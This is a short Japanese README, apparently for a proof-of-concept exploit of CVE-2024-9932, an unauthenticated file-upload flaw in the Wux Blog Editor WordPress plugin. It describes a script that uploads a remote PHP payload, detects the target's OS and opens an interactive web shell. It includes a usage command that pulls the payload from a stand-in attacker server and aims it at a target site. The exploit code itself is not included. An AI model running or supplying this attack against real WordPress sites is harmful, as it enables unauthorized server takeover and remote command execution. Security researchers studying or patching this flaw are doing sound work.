
CVE-2024-9932 用の未認証 0-click RCE エクスプロイト。Wux Blog Editor WordPress プラグインの任意ファイルアップロード脆弱性を悪用し、リモート PHP ペイロードをアップロードしてターゲットの OS を検出し、インタラクティブな Web シェルを通じてリモートコマンド実行を実現します。

このリポジトリには、Wux Blog Editor WordPressプラグインの認証されていない任意のファイルアップロードの脆弱性であるCVE-2024-9932の概念実証エクスプロイトが含まれており、リモートコード実行(RCE)につながります。
このスクリプトは、認証なしでリモートPHPペイロードをアップロードするために、脆弱なRESTエンドポイントを悪用します。アップロード後、最終的なファイルの場所を再構築し、ターゲットのオペレーティングシステムを検出し、コマンド実行のための対話型リモートシェルを提供します。
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
実行後、スクリプトはペイロードをアップロードし、そのアクセス可能性を確認し、OSを検出して、対話型シェルに移行します。